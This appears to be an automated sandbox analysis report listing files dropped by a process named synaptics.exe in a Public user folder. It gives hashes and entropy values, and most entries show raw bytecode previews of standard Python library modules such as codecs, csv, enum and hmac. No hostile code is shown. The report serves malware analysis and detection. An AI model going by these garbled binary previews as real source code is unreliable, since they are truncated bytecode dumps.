                                                                                                                                                                                                                                  Preview:o........'-d........................@...sD...d.Z.d.d.l.Z.d.d.l.Z.z.d.d.l.T.W.n...e.y"..Z...z.e.d.e.......d.Z.[.w.w.g.d...Z.d.Z.d...Z.Z.d...Z.Z.d.Z.d.Z.e.j.d.k.rAe...Z.Z.e.Z.n.e...Z.Z.e.Z.e.Z.e.Z.e.Z.e.Z.G.d.d...d.e...Z.G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z G.d.d...d...Z!G.d.d...d...Z"dCd#d$..Z#dDd%d&..Z$d'd(..Z%d)d*..Z&d+d,..Z'd-d...Z(d/d0..Z)d1d2..Z*dEd3d4..Z+dEd5d6..Z,d7d8..Z-d9d:..Z.z.e/d!..Z0e/d;..Z1e/d<..Z2e/d=..Z3e/d>..Z4e/d?..Z5W.n...e6y.......d.Z0d.Z1d.Z2d.Z3d.Z4d.Z5Y.n.w.d.Z7e7..r.d.d.l8Z8e9d@k...r e$e.j:dAdB..e._:e$e.j;dBdA..e._;d.S.d.S.)Fz. codecs -- Python Codec Registry, API and helpers....Written by Marc-Andre Lemburg (mal@lemburg.com)...(c) Copyright CNRI, All Rights Reserved. NO WARRANTY........N)...*z%Failed to load the builtin codecs: %s),..register..lookup..open..EncodedFile..BOM..BOM_BE..BOM_LE..BOM32_BE..BOM32_LE..BOM64_BE..BOM64_LE..BOM_UTF8..BOM_UTF16..BOM_UTF16_LE..BOM_UTF16_BE..BOM_UTF32..
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):20906
                                                                                                                                                                                                                                  Entropy (8bit):5.0842204147752526
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:rrcHbNxImphzxb/Dqd89tiVqnWcxavd5VCqXfNnpJ:vcHbNxhzpqd2OqnWvQAFf
                                                                                                                                                                                                                                  MD5:C82F49DB0D5DC2CEF96515E0FA5E44EB
                                                                                                                                                                                                                                  SHA1:BEC72681A40EE1E69E582528317C7484D006A36D
                                                                                                                                                                                                                                  SHA-256:A967CCF06A6F822096CBB29E881858AE6DD8221599E4F2BC5B392ED5412DC7B5
                                                                                                                                                                                                                                  SHA-512:2E28804F2CDFE9A91F2A773CA83C2B3698C75840966392F5FD20268BC6630FF79ACC103D5F2523B7C9FCC9E3759D1AEB15CEFA0977DFFC9FDE5A28E19C30604A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.h.......................@...s~...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...g.d...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d...Z.G.d.d...d.e.e.e...Z.G.d.d...d.e.e.e...Z.d.d...Z.d.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d ..d e...Z.G.d!d"..d"e...Z.G.d#d$..d$e...Z.G.d%d&..d&..Z.G.d'd(..d(e.e...Z.G.d)d*..d*e.e...Z.G.d+d,..d,e.e...Z d.S.)-z4Utilities for with-statement contexts. See PEP 343......N)...deque....wraps)...MethodType..Generiuseras)...asynccontextmanager..contextmanager..closing..nullcontext..AbstractContextManager..AbstractAsyncContextManager..AsyncExitStack..ContextDecorator..ExitStack..redirect_stdout..redirect_stderr..suppress..aclosingc....................@....:...e.Z.d.Z.d.Z.e.e...Z.d.d...Z.e.j.d.d.....Z.e.d.d.....Z.d.S.).r....z,An abstract base class for context managers.c....................C........|.S...z0Return `self` upon entering the runtime context.......selfr....r.....,C:
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):7007
                                                                                                                                                                                                                                  Entropy (8bit):5.421860505439238
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:lxPakDZxS5GwVc3isTDOuyib91quyccWEQTidqf2hMQkNv4n5q:Pa0/S5GacR/Iib9wEREkidQ2Ov4k
                                                                                                                                                                                                                                  MD5:99A6D7E897A30D02C97435D94D21A32B
                                                                                                                                                                                                                                  SHA1:A8D3C2881C05D36E38D70D9F38C25D6379A685EC
                                                                                                                                                                                                                                  SHA-256:77D2893134DBB8048F0686E719535A5148E748B56DB58B4204C2CA0C2532BF7E
                                                                                                                                                                                                                                  SHA-512:FAC5BBED49E91A1B5439A6D37DA1A876AE8C38242F49278597BE220EA757B10D6F6CF9CADFD5407A1F230AE562A0012564526324523C5423449ED44F79E809DE
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.#.......................@...sV...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...G.d.d...d.e...Z.e.Z.z.d.d.l.m.Z...W.n...e.y-......d.Z.Y.n.w.g.d...Z.d.d...Z.i...Z.Z.d.d...Z.e.d...e.e.e.e.e.e.e.e.e.e.e.e.e.j.e.e...e.e...e.j.e.j f.D.].Z!e.e.e!<.q[e"e.d.d...Z!e!d.u.rpe.e.e!<.e#j.e.e#<.e$j.e.e$<.e%j.e.e%<.e&j.e.e&<.e.d.u.r.e.j.e.e.<.[.[!d.g.f.d.d...Z'i...Z(Z.d.d...Z)e)e.e.d...<.e)e.e.e...<.e)e.e.e...<.e)e.e.<.e)e.e.<.e)e.e.<.e)e.e.<.e)e.e.<.e)e.e.<.e)e.e.j*<.e)e.e.<.e)e.e.<.e)e.e.j.<.e)e.e.j.<.e)e.e.j <.e)e.e.<.e'f.d.d...Z+e+e.e#<.e'f.d.d...Z,e,e.e.<.e'f.d.d...Z-e-e.e$<.e.d.u...r.e-e.e.<.d.d...Z.e.e.e.j/<.[.d.d...Z0..d.e'd...d.d...Z1[.[.[.d.S.).a....Generic (shallow and deep) copying operations...Interface summary:.. import copy.. x = copy.copy(y) # make a shallow copy of y. x = copy.deepcopy(y) # make a deep copy of y..For module specific errors, copy.Error is raised...The difference between shallow and deep copying is only relevant for.compound objects (object
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4694
                                                                                                                                                                                                                                  Entropy (8bit):5.3034929104246205
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:ZCI7QMLHGjZZc9X1XBrxbbJz0uqhUaCWfqmb5p2LYHjmTrhqH3TpYXGP2:HvHGOBrpb56eWfhqLYHjmTkH3TpY2P2
                                                                                                                                                                                                                                  MD5:103D050ACE177948729C65C56AF01CB5
                                                                                                                                                                                                                                  SHA1:4FB68E53FBF67E9514AF90A3937A5E5C2CDC74C5
                                                                                                                                                                                                                                  SHA-256:69668748421BD65A7974A69BE6138D54018D80582EBFFB5719490290B3B6A85B
                                                                                                                                                                                                                                  SHA-512:306BB8823ABB8BD934DEFBC7EAA88F5B573D7AAB7D533D81EBEBC3CB52D6B7514C9A7E92914E849F7247FCDD10B2160C564068D332909F997174A488D68981C3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s....d.Z.g.d...Z.i.Z.d.d.d...Z.d.d...Z.z.e...W.n...e.y.......Y.n.w.d.d...Z.e.e.e.e.....d.d...Z.e.e.e.e.B...e.....d.d...Z.d.Z.e.e.j...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.i.Z.i.Z.i.Z.d.d...Z.d.d...Z.d.d...Z.d.S.).z.Helper to provide extensibility for pickle...This is only useful to add pickle support for extension types defined in.C, not for instances of user-defined classes..)...pickle..constructor..add_extension..remove_extension..clear_extension_cacheNc....................C...s0...t.|...s.t.d.....|.t.|.<.|.d.u.r.t.|.....d.S.d.S.).Nz$reduction functions must be callable)...callable..TypeError..dispatch_tabler....).Z.ob_typeZ.pickle_functionZ.constructor_ob..r.....)C:\Users\Public\M20EKMMEH2\lib\copyreg.pyr........s................r....c....................C...s....t.|...s.t.d.....d.S.).Nz.constructors must be callable).r....r....)...objectr....r....r....r........s..........r....c....................C...s....t.|.j.|.j.f.f.S...N)...complex..real..im
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11809
                                                                                                                                                                                                                                  Entropy (8bit):5.447004589437788
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:WJq1+Bd5hSIQIWWvBMKumwKZdlXiWQA3LYPqOW9PJFoKzckOMsj9XCCDH:WJqCLSIQ2OKuuZrXiWQA0shzJaYWH
                                                                                                                                                                                                                                  MD5:89D0ED91028B8079BAE446113D819704
                                                                                                                                                                                                                                  SHA1:ADAC6F8BA6DB7E7226A531049210F17FA0280186
                                                                                                                                                                                                                                  SHA-256:A0B64D68912646643A7DFFC1B2462CC3E7C024BD9EFF719CC02197702046FBE9
                                                                                                                                                                                                                                  SHA-512:A697B9A3FE33076B2477A44649560A8BEF11D56CD83CDB273671A795E150A71071D1B8FA24FF6C6486485C7B89E53A9DF544CFB379C7CC4297997DE30EAB72DA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-dZ@.......................@...s....d.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z.G.d.d...d...Z.G.d.d...d.e...Z.e.d.e.....G.d.d...d.e...Z.e.d.e.....G.d.d...d.e...Z.e.d.e.....G.d.d...d...Z.G.d.d...d...Z.z.e...W.n...e.y.......e.Z.Y.n.w.G.d.d...d...Z.d.S.).z+.csv.py - read/write/investigate CSV files......N)...Error..__version__..writer..reader..register_dialect..unregister_dialect..get_dialect..list_dialects..field_size_limit..QUOTE_MINIMAL..QUOTE_ALL..QUOTE_NONNUMERIC..QUOTE_NONE..__doc__)...Dialect)...StringIO).r....r....r....r....r....r....r......excel..excel_tabr....r....r....r....r....r......Snifferr....r......DictReader..DictWriter..unix_dialectc....................@...sD...e.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.S.).r....z.Describe a CSV dialect... This must be subclassed (see csv.excel). Valid attributes are:. delimiter, quotechar, escapechar, doublequote, skipinitialspace,.
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):56544
                                                                                                                                                                                                                                  Entropy (8bit):5.2501757794184485
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:NoPNdGbiwEyaNVxLZnkM238oZMpj6355j9RsFdVY:NWF1LMP5
                                                                                                                                                                                                                                  MD5:7C12097F4F867AD4B4997C1994641C9C
                                                                                                                                                                                                                                  SHA1:04A32F29EB00F027F487F840D791FC544FABB297
                                                                                                                                                                                                                                  SHA-256:557E8764DCA6C36634794C175F7912EA1F4BCEDFB22FCA6C528599706FBB5FF4
                                                                                                                                                                                                                                  SHA-512:778C1C3E842226CF679781EDB6893F339658C8E86EBE8064FE0B992B0C24F4FBE517B7BF7FFA9C24052B02DD490F1DB7884B0AB66FF35B166AC641B8B89FD22C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.a.......................@...sr...d.Z.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d...Z.d.Z.d.Z.d.Z.g.d...Z.d.g.Z.d.Z.e.d.d.....D.].Z.e...e.....e.e.7.Z.q/[.[.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.d...Z.e.d...Z.e.d...Z.e.d.k.scJ...e.d.e...d...k.smJ...e.d.e...d...k.swJ...d.d...Z.g.d...Z.g.d...Z.d d!..Z.d\d#d$..Z.d%d&..Z d'd(..Z!d)d*..Z"d+d,..Z#d-d...Z$d/d0..Z%d1d2..Z&d3d4..Z'd5d6..Z(d7d8..Z)d9d:..Z*d;d<..Z+G.d=d>..d>..Z,e,d?..e,_-e,d@dAdBdBdCdD..e,_.e,d.dE..e,_/G.dFdG..dG..Z0e0Z1e0d.d.d...e0_-e0d.dHdI..e0_.e,d.dJ..e0_/G.dKdL..dL..Z2G.dMdN..dNe3..Z4e4Z5[4e2Z6G.dOdP..dP..Z.e.Z7e.d.d.d...e._-e.dAdBdBdC..e._.e,d.dE..e._/G.dQdR..dRe0..Z8e8d.d.d...e8_-e8d.dHdIdAdBdBdC..e8_.e,d.dE..e8_/dSdT..Z9G.dUdV..dVe2..Z:e:.;e,d.....e:_<e:.;e,dAdBdW......e:_-e:.;e,dAdBdW....e:_.e8dXd.d.e:j<dY..Z=z.d.dZl>T.W.n...e?..y.......Y.d.S.w.[.[.[.[.[.[.[=[.[.[.['[([)[%[&[.[*[1[.[.[.[.[ [.[.[9[.[.[.[7[6[![.[+["[$[#[5d.d[l>m.Z...d.S.)]z.Concrete date/time and related types...See http://www.iana.org/time-
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):26074
                                                                                                                                                                                                                                  Entropy (8bit):5.285956873463293
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:EOTKcmNJ6I61HjkGoQEARW5nV3j412nrp+6s8LY4F8AGK/h3Ec:EaGNJgJEARW3Ea+VZ4F8AGK/Wc
                                                                                                                                                                                                                                  MD5:B42816F55E53D5D4688939DCB53A704C
                                                                                                                                                                                                                                  SHA1:3CB176D0EB321EB155D21E71B764A4EACFE6312F
                                                                                                                                                                                                                                  SHA-256:697D08C263D3718762608C154D82E865AD06A0F5B53B264322C55EC18A9EDF91
                                                                                                                                                                                                                                  SHA-512:D2E401CBAEDDA1C484762DCDF44BE10331B1D438206CA739DF5456141AD4F7CA7926CC70BA5C388B19B4B278D8531B0929AA5232E673969BD2888119050B569E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s....d.d.l.Z.d.d.l.m.Z.m.Z...g.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e...Z.G.d.d...d...Z.G.d.d...d.e...Z.d.Z.G.d.d...d.e...Z.G.d.d...d.e.d...Z.G.d.d...d.e.e...Z.d.d...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.d.d ..Z.d!d"..Z.d#d$..Z.d.S.)%.....N)...MappingProxyType..DynamicClassAttribute)...EnumMeta..Enum..IntEnum..Flag..IntFlag..auto..uniquec....................C...s....t.|.d...p.t.|.d...p.t.|.d...S.).z?. Returns True if obj is a descriptor, False otherwise.. ..__get__..__set__..__delete__)...hasattr)...obj..r.....&C:\Users\Public\M20EKMMEH2\lib\enum.py.._is_descriptor....s..............r....c....................C...sL...t.|...d.k.o%|.d.d.....|.d.d.........k.o.d.k.n.....o%|.d...d.k.o%|.d...d.k.S.).z=. Returns True if a __dunder__ name, False otherwise.. .....N..........Z.__.._.........len....namer....r....r......_is_dunder....s......&...........r....c....................C...sL...t.|...d.k.o%|.d...|.d.......k.o.d.k.n.....o%|.d.d...
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4255
                                                                                                                                                                                                                                  Entropy (8bit):5.6678545580929836
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:rZ1NvFl7gPHn5gns99V7Ry+/63Tq7Y1qYmWVzHRJwZLaL1iCtiOy9:r1vFl7g/SnsV7g7HzTRbdUV
                                                                                                                                                                                                                                  MD5:1B2B2224EB05DA1357931A7BEFAAFA3A
                                                                                                                                                                                                                                  SHA1:504B41A28DF015F31CD3517CB23C49C84A33A8CB
                                                                                                                                                                                                                                  SHA-256:36DD723644AB65D18596DBD465DD7F2B0F88F2E5F99F525802793C56D7040610
                                                                                                                                                                                                                                  SHA-512:F11A746DE36AB651A2C1C5B9B6DA1248413B2E810421BCFA1245C2EF7DBA2C071844E5D6657B666FFFC2C5360EE9C202D622B0CCC9C9CBF6B408AF0439D94DE3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s|...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.d.d.l.m.Z...e...j.Z.[.d.d...Z.e.j.d.d.d...d.d.....Z.d.d...Z.d.d...Z.d.d...Z.d.S.).a....Filename matching with shell patterns...fnmatch(FILENAME, PATTERN) matches according to the local convention..fnmatchcase(FILENAME, PATTERN) always takes case in account...The functions operate by translating the pattern into a regular.expression. They cache the compiled regular expressions for speed...The function translate(PATTERN) returns a regular expression.corresponding to PATTERN. (It does not compile it.)......N)...filter..fnmatch..fnmatchcase..translate)...countc....................C...s"...t.j...|...}.t.j...|...}.t.|.|...S.).a....Test whether FILENAME matches PATTERN... Patterns are Unix shell style:.. * matches everything. ? matches any single character. [seq] matches any character in seq. [!seq] matches any char not in seq.. An initial period in FILENAME is not spec
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):28346
                                                                                                                                                                                                                                  Entropy (8bit):5.346465244882475
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:8oO3KwjQNi3/sZoyIw/kj5N4V+xIhb85NxshpCzCLF:8o1MQNi30Cj5iV+0b853IMmLF
                                                                                                                                                                                                                                  MD5:C6A0A2CAC3CA1E5E9409AAF9662D624E
                                                                                                                                                                                                                                  SHA1:2E2CF528E44F0C2CCB40133612CE09D0625AFC34
                                                                                                                                                                                                                                  SHA-256:14469C7772565C447A1861F482EA51C8BACF5617D2BD8C91033EED852EF3574F
                                                                                                                                                                                                                                  SHA-512:9175C5613FA45ADFAB5E02C48DDDAE056BC34E757BBBB1F60E5FF77A89A916940ECDB3C324768588C48F7C8F8604ECEBE768AB7CE3FB816DE4D685B4678F0F79
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s....d.Z.g.d...Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.e.e.f.d.d...Z.e.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d d!..Z.e.f.d"d#..Z.e.f.d$d%..Z.d&e.f.d'e.f.d(e.f.g.d(e.f.d)e.f.d&e.f.g.d)e.f.d(e.f.d'e.f.g.d'e.f.d&e.f.d)e.f.g.d*..Z.d+d,..Z.d-d...Z.z.d.d/l m.Z...W.n...e!y.......Y.n.w.e"..Z#e#f.d0d1..Z$z.d.d2l m$Z$..W.n...e!y.......Y.n.w.G.d3d4..d4..Z%z.d.d5l m%Z%..W.n...e!y.......Y.n.w.G.d6d7..d7e"..Z&d8d9..Z'e.d:g.d;....Z(G.d<d=..d=e)..Z*e"..f.e+e,h.e-e.e/f.d>d?..Z0dXdBdC..Z1dDdE..Z2z.d.dFl m2Z2..W.n...e!..y;......Y.n.w.dGdH..Z3dIdJ..Z4dYdLdM..Z5dNdO..Z6dPdQ..Z7dRdS..Z8G.dTdU..dU..Z9e"..Z:G.dVdW..dW..Z;dKS.)ZzEfunctools.py - Tools for working with functions and callable objects.)...update_wrapper..wraps..WRAPPER_ASSIGNMENTS..WRAPPER_UPDATES..total_ordering..cache..cmp_to_key..lru_cache..reduce..partial..partialmethod..singledispatch..si
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3918
                                                                                                                                                                                                                                  Entropy (8bit):5.1765688067672775
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:uqsfAs4EvzosntVf4/zsSQ1ow+2U/tAaDKDj51dmvuoZ:Fs4itKyow8/tjgqWoZ
                                                                                                                                                                                                                                  MD5:F3543CEAF318D4B4AF7F020486AA3469
                                                                                                                                                                                                                                  SHA1:165DB8D4A8CE772A17C177944EA774D5785723E8
                                                                                                                                                                                                                                  SHA-256:07247A3A1042878BD0C93E357AB0AE6935051C113394B91DED33180C987B2E62
                                                                                                                                                                                                                                  SHA-512:203BAA37518117E0B01EEB8BCC669AC3EFBD6EAC8063B9F75C64135047D8510D78A133F35E954B1D6E5E437EF8725D78EA6959767A15EB9B481336E005E4C25C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s....d.Z.d.d.l.Z.d.d.l.Z.g.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.).z..Path operations common to more than one OS.Do not use directly. The OS specific modules import the appropriate.functions from this module themselves.......N)...commonprefix..exists..getatime..getctime..getmtime..getsize..isdir..isfile..samefile..sameopenfile..samestatc....................C...s*...z.t...|.....W.d.S...t.t.f.y.......Y.d.S.w.).zDTest whether a path exists. Returns False for broken symbolic linksFT)...os..stat..OSError..ValueError)...path..r.....-C:\Users\Public\M20EKMMEH2\lib\genericpath.pyr........s................r....c....................C....4...z.t...|...}.W.n...t.t.f.y.......Y.d.S.w.t...|.j...S.).z%Test whether a path is a regular fileF).r....r....r....r......S_ISREG..st_mode).r......str....r....r....r.........................r....c....................C...r....).z<Return true if th
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6856
                                                                                                                                                                                                                                  Entropy (8bit):5.597514979475414
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:IdPjhwzUgQUdROKh0WXI7dQia/kD6s2rt6iojyyt8NQCcx54bNdO9DF4irm/tMmh:IRmE5+odQiaMDJ2tv4OmVP/4XbJ4nJ0
                                                                                                                                                                                                                                  MD5:17A483B169622B4D1B6188A6804A655F
                                                                                                                                                                                                                                  SHA1:EAEC1681B7FD1DB60337EE3E126B2FBF2084C0C9
                                                                                                                                                                                                                                  SHA-256:484BA1D1DE475C4876B98B218CDE1148BA2E6F8DADFF12707102A958982BBA96
                                                                                                                                                                                                                                  SHA-512:F0B58A9B23A3988672E7623A6052F92F7FE734215FA8E6424ED2601A1A728246F0E2DCCB86B790957CAEBD0B6990DF459D8906322D738293CCCA8212386176C1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.).......................@...sl...d.Z.d.Z.e.e...Z.e.e...Z.e.d...Z.i.Z.d.d.h.Z.d.d...Z.d.d...Z.d.d.d...Z.d.d.d...Z.z.d.d.l.Z.e.Z.e.Z.e...e.j...Z.W.n...e.yG......d.Z.e.Z.e.Z.Y.n.w.z.d.d.l.m.Z...W.n*..e.yz......d.d.l.m.Z...e.d.d...e.d...D.....Z.e.d.d...e.d...D.....Z.d.d.d...Z.Y.n.w.z.d.d.l.m.Z...W.n...e.y.......Y.n.w.e.D.].Z.z.e.e...e...e.<.W.q...e.y.......d.d.l.Z.e...d.e.....Y.q.w.[.[.[.[.[.[.d.S.).a3...hashlib module - A common interface to many hash functions...new(name, data=b'', **kwargs) - returns a new hash object implementing the. given hash function; initializing the hash. using the given binary data...Named constructor functions are also available, these are faster.than using new(name):..md5(), sha1(), sha224(), sha256(), sha384(), sha512(), blake2b(), blake2s(),.sha3_224, sha3_256, sha3_384, sha3_512, shake_128, and shake_256...More algorithms may be available on your platform but the above are guaranteed
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13876
                                                                                                                                                                                                                                  Entropy (8bit):5.35456999206203
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:ynqTYZnQtot7ItafyjjWya/PX6FGRxibJWiTqe0hN2leov+Ugn:ynEYZn0ot7It7j3aX6gRxiM0uN2kk+/n
                                                                                                                                                                                                                                  MD5:BF809D4B6A59C3B08A3D1CBEB404F7D3
                                                                                                                                                                                                                                  SHA1:FF93B7021A5217359CA2430F3EDFC278DB6B766E
                                                                                                                                                                                                                                  SHA-256:36BB5EE0B57EE6409BB4EA76D15ECFC47F71264164CC05BFA1F10AE48844370F
                                                                                                                                                                                                                                  SHA-512:4E2322C46672AB2C042E54BE1BE3B78C65AA6F00D1B7179DB71DED35D4E0D293600108E136BD32D07570005DDE213F9BA50E73FBB66BE2D859F1845AEA5CE100
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.[.......................@...sD...d.Z.d.Z.g.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.d...d.d...Z.d*d d!..Z.d*d"d#..Z.z.d$d%l.T.W.n...e.yY......Y.n.w.z.d$d&l.m.Z...W.n...e.yk......Y.n.w.z.d$d'l.m.Z...W.n...e.y}......Y.n.w.z.d$d(l.m.Z...W.n...e.y.......Y.n.w.e.d)k.r.d$d.l.Z.e.e.........d.S.d.S.)+a....Heap queue algorithm (a.k.a. priority queue)...Heaps are arrays for which a[k] <= a[2*k+1] and a[k] <= a[2*k+2] for.all k, counting elements from 0. For the sake of comparison,.non-existing elements are considered to be infinite. The interesting.property of a heap is that a[0] is always its smallest element...Usage:..heap = [] # creates an empty heap.heappush(heap, item) # pushes a new item on the heap.item = heappop(heap) # pops the smallest item from the heap.item = heap[0] # smallest item on the heap without popping it.heapify(x) # transforms list into a heap, in-place, in linear time
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6984
                                                                                                                                                                                                                                  Entropy (8bit):5.298296736755448
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:L/FTSdeLSo3yfjb/3xXrCx5PgT1nxc203AbC:L/FT0eLhyX1K5S1nv0QbC
                                                                                                                                                                                                                                  MD5:7C213842B50E304FC30E098FF86273D0
                                                                                                                                                                                                                                  SHA1:9AA65E3FDC89CB7688AB8ED9DAF83812BF3DA220
                                                                                                                                                                                                                                  SHA-256:58DE983F84F3DFA6C5F4113C1C7FAD5E9B02510B845EEA72DF440550C47402C4
                                                                                                                                                                                                                                  SHA-512:F5F8DE7E714CE56472F003B8B48F3E8BE925D064C0E7D4F408E37A2E2D302E3ED790762DAFCA383180A8C1293C88F77AFBDEC769E945C5F12642852970726C7E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s....d.Z.d.d.l.Z.z.d.d.l.Z.W.n...e.y.......d.Z.d.Z.d.d.l.m.Z...Y.n.w.e.j.Z.e.e.j...Z.d.d.l.Z.e.d.d...e.d...D.....Z.e.d.d...e.d...D.....Z.d.Z.G.d.d...d...Z.d.d.d...Z.d.d...Z.d.S.).zqHMAC (Keyed-Hashing for Message Authentication) module...Implements the HMAC algorithm as described by RFC 2104.......N)..._compare_digestc....................c..........|.].}.|.d.A.V...q.d.S.)..\...N.......0..xr....r.....&C:\Users\Public\M20EKMMEH2\lib\hmac.py..<genexpr>.............r.........c....................c...r....)..6...Nr....r....r....r....r....r........r....c....................@...sf...e.Z.d.Z.d.Z.d.Z.d.Z.d.d.d...Z.d.d...Z.d.d...Z.e.d.d.....Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...HMACz~RFC 2104 HMAC class. Also complies with RFC 4231... This supports the API for Cryptographic Hash Functions (PEP 247).. .@...)..._hmac.._inner.._outer..block_size..digest_sizeN..c....................C...s....t.|.t.t.f...s.t.d.t.|...j.......|.s.t.d.....t.r<t.
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3674
                                                                                                                                                                                                                                  Entropy (8bit):5.398327365740386
                                                                                                                                                                                                                                  Encrypted:false
